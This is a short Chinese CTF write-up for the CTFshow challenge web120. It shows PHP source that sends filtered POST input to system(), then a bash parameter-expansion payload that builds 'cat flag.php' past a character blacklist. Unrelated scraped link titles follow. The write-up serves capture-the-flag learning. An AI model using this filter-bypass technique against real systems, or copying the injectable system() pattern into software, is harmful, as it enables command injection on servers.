目录

  • 源码
  • 思路
  • 题解
  • 总结

源码


<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){$code=$_POST['code'];if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|PATH|BASH|HOME|\/|\(|\)|\[|\]|\\\\|\+|\-|\!|\=|\^|\*|\x26|\%|\<|\>|\'|\"|\`|\||\,/', $code)){    if(strlen($code)>65){echo '<div align="center">'.'you are so long , I dont like '.'</div>';}else{echo '<div align="center">'.system($code).'</div>';}}else{echo '<div align="center">evil input</div>';}
}?>

思路

拼接了 /bin/nl 发现没回显 没思路了
看了下hint:

/bin/cat flag.php
${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???

说明题目$USER 最后一位是a 这个一般都猜不到吧

题解

code=${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???

总结

感觉题目不是很好

CTFshow 命令执行 web120相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  3. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  4. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  5. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  6. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  7. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  8. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  9. CTFshow 命令执行 web56

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

最新文章

  1. MongoDB sharding迁移那些事(一)
  2. html2canvas解决保存图片模糊问题
  3. html table导出到Excel中,不走后台,js完成
  4. python实现搜索之二分查找
  5. zoj 1078 palindrom numbers
  6. 如何才能成为一个成功的项目经理
  7. php实现ppt样式效果源码,jQuery移动端和桌面设备的轻量级幻灯片特效源码
  8. php _line_,php基本语法
  9. UE5热更新(Pak包的Cook,打包,加载,踩过的一些坑)
  10. 记录一下,不是所有的韩语输入法apk,装到同一个系统,都能弹出软键盘
  11. ps怎么撤销参考线_干货技巧 | Photoshop10大奇技淫巧(肯定有你不知道的!)
  12. 【easyui】之DataGrid数据显示
  13. OpenERP-指定动作视图
  14. 优漫动游平面设计的形式美
  15. 紅米android os,红米7A 魔趣OS 安卓10 纯净完美 原生极简 纯净推荐
  16. 认识区块链,认知区块链——百花争鸣
  17. 计算机网络举例说明,什么是计算机网络,举例说明计算机网络有哪些应用?
  18. 简述TCP的流量控制与拥塞控制
  19. 跨域解决方式——JSONP,CORS
  20. MySQL迁移到kdb_Q语言把mysql输入导入到KDB+数据库

热门文章

  1. YUI Grid CSS的优雅设计(转)
  2. python项目实战:最简单的图片转字符画
  3. MySQL修改datadir目录
  4. MySQL利用xtrabackup进行增量备份详细过程汇总
  5. php无法加载Memcache缓存模块问题及Memcache的安装
  6. 关于伪静态网站的好处
  7. QuickFlow之任务代理-TaskDelegation
  8. 打地鼠程序代码C语言,自己用C写的一个简单的打地鼠游戏代码出了个问题(鼠标和循环不能...
  9. linux 查看ftp账户,linux的ftp服务之本地访问浏览与虚拟账户
  10. matlab下的textread()